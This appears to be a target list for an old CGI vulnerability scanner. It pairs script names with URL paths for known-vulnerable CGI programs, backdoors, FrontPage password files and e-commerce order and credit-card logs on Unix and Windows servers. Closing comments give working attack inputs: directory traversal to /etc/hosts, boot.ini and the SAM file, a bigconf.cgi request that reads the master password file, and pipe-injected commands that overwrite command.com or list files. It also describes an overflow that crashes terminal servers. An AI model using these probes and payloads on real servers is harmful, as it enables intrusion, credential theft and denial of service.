phf /cgi-bin/phf nix
Count.cgi /cgi-bin/Count.cgi nix
test-cgi  /cgi-bin/test-cgi nix
php.cgi /cgi-bin/php.cgi nix
handler /cgi-bin/handler nix
webgais /cgi-bin/webgais nix
websendmail /cgi-bin/websendmail nix
webdist.cgi /cgi-bin/webdist.cgi nix
faxsurvey  /cgi-bin/faxsurvey nix
htmlscript /cgi-bin/htmlscript nix
pfdisplay  /cgi-bin/pfdisplay nix
pfdisplay.cgi /cgi-bin/pfdisplay.cgi nix
perl.exe   /cgi-bin/perl.exe nix
wwwboard.pl /cgi-bin/wwwboard.pl nix
finger /cgi-bin/finger nix
bnbform.cgi /cgi-bin/bnbform.cgi nix
survey.cgi  /cgi-bin/survey.cgi nix
classifieds.cgi /cgi-bin/classifieds.cgi nix
textcounter.pl  /cgi-bin/textcounter.pl nix
UnlG-backd00r /cgi-bin/unlg1.1      nix
THC-backd00r  /cgi-bin/rwwwshell.pl nix
nph-test-cgi  /cgi-bin/nph-test-cgi nix
nph-publish   /cgi-bin/nph-publish  nix
www-sql       /cgi-bin/www-sql      nix
view-source   /cgi-bin/view-source  nix
campas   /cgi-bin/campas	nix
aglimpse /cgi-bin/aglimpse nix
glimpse  /cgi-bin/glimpse	nix
man.sh   /cgi-bin/man.sh	nix
AT-admin.cgi /cgi-bin/AT-admin.cgi nix
filemail.pl  /cgi-bin/filemail.pl nix
maillist.pl  /cgi-bin/maillist.pl nix
jj /cgi-bin/jj	nix
info2www /cgi-bin/info2www nix
files.pl /cgi-bin/files.pl nix
AnyForm2 /cgi-bin/AnyForm2 nix
environ.cgi /cgi-bin/environ.cgi nix
vti_inf.html /_vti_inf.html ms
service.pwd /_vti_pvt/service.pwd ms
users.pwd   /_vti_pvt/users.pwd ms
authors.pwd /_vti_pvt/authors.pwd ms
administrators /_vti_pvt/administrators.pwd ms
shtml.dll /_vti_pvt/shtml.dll ms
shtml.exe /_vti_pvt/shtml.exe ms
args.bat /cgi-dos/args.bat ms
uploader.exe /cgi-win/uploader.exe ms
rguest.exe /cgi-bin/rguest.exe ms
wguest.exe /cgi-bin/wguest.exe ms
bdir-samples /scripts/issadmin/bdir.htr ms
uploadn.asp /scripts/uploadn.asp ms
CGImail.exe /scripts/CGImail.exe ms
newdsn.exe /scripts/tools/newdsn.exe ms
IIS/Perl /scripts/no-such-file.pl ms
convert.bas /scripts/convert.bas ms
fpcount.exe /scripts/fpcount.exe ms
openfile.cfm /cfdocs/expelval/openfile.cfm ms
exprcalc.cfm /cfdocs/expelval/exprcalc.cfm ms
displayopenedfile.cfm /cfdocs/expelval/displayopenedfile.cfm ms
sendmail.cfm /cfdocs/expelval/sendmail.cfm ms
codebrws.asp /iissamples/exair/howitworks/codebrws.asp ms
codebrws.asp(2) /iissamples/sdk/asp/docs/codebrws.asp ms
showcode.asp /msads/Samples/SELECTOR/showcode.asp ms
search97.vts /search97.vts ms
carbo.dll /carbo.dll ms
wrap /cgi-bin/wrap nix
cgiwrap /cgi-bin/cgiwrap nix
guestbook.cgi /cgi-bin/guestbook.cgi nix
edit.pl /cgi-bin/edit.pl nix
perlshop.cgi /cgi-bin/perlshop.cgi nix
anyboard.cgi /cgi-bin/anyboard.cgi nix
webbbs.cgi /cgi-bin/webbbs.cgi nix
whois /cgi-bin/whois_raw.cgi nix
cachemgr.cgi /cgi-bin/cachemgr.cgi nix
query /cgi-bin/query nix
rpm_query /cgi-bin/rpm_query nix
import.txt /config/import.txt ms
checks.txt /config/checks.txt ms
import.txt2 /orders/import.txt ms
checks.txt2 /orders/checks.txt ms
counter.exe /scripts/counter.exe ms
visadmin.exe /cgi-bin/visadmin.exe ms
fpexplore.exe /cgi-bin/fpexplore.exe ms
cc.txt(1) /WebShop/templates/cc.txt ms
cc.txt(2) /WebShop/logs/cc.txt ms
ck.log /WebShop/logs/ck.log ms
order.log(1) /Admin_files/order.log ms
order.log(2) /Orders/order.log ms
order.log(3) /order/order.log ms
order.log(4) /orders/order.log ms
order.log(5) /mall_log_files/order.log ms
order.log(6) /PDG_Cart/order.log ms
quikstore.cfg /quikstore.cfg ms
shopper.conf /PDG_Cart/shopper.conf ms
storemgr.pw /pw/storemgr.pw ms
orders.txt(1) /config/orders.txt ms
orders.txt(2) /orders/orders.txt ms
mountain.cfg(1) /config/mountain.cfg ms
mountain.cfg(2) /orders/mountain.cfg ms
query.asp /iissamples/iissamples/query.asp ms
advsearch.asp /iissamples/exair/search/advsearch.asp ms
aexp2.htr /iisadmpwd/aexp2.htr ms
site.csc /adsamples/config/site.csc ms
Debian_Boa /doc nix
ICQ_99_WebServer /.html/............./config.sys ms
add_ftp.cgi /cgi-bin/add_ftp.cgi nix
ax.cgi /cgi-bin/ax.cgi nix
ax-admin.cgi /cgi-bin/ax-admin.cgi nix
architext_query.pl /cgi-bin/architext_query.pl nix
w3-msql /cgi-bin/w3-msql/ ms
imagemap.exe /cgi-bin/imagemap.exe ms

# http://annex.server.here/ping?query=aaaaa..etc..aaaa might make the server goes boom!
Annex_terminal_Servers /ping all

# 'bigconf.cgi?command=view_textfile&file=/etc/master.passwd&filters=; will display shadow 
# file coz bigconf is uid 0 by default on BigIP version 2.1.2 and below
bigconf.cfg /cgi-bin/bigconf.cgi all

# Commom bugs on some httpds which allow remote user to grab any files from server
Common_Httpd_bug_test[1] /....../ all
Common_Httpd_bug_test[2] /....../config.sys ms
Common_Httpd_bug_test[3] /....../etc/hosts nix
Common_Httpd_bug_test[4] /../../../../ all
Common_Httpd_bug_test[5] /../../../../config.sys ms
Common_Httpd_bug_test[6] /../../../../etc/hosts nix

# http://www.victim.com/cgi-bin/get32.exe|echo%20>c:\command.com  will overwrote command.com
Alibaba(1) /cgi-bin/get32.exe ms
# http://www.victim.com/cgi-bin/alibaba.pl|dir  will display files in CWD
Alibaba(2) /cgi-bin/alibaba.pl ms
# http://www.victim.com/cgi-bin/tst.bat|type%20c:\windows\win.ini  will open win.ini for viewing
Alibaba(3) /cgi-bin/tst.bat ms

TeamTrack_WebServer /../../../../../../../boot.ini ms
TeamTrack_WebServer /../../../../../winnt/repair/sam._ ms

# Got CGI ?? Kewl...plz update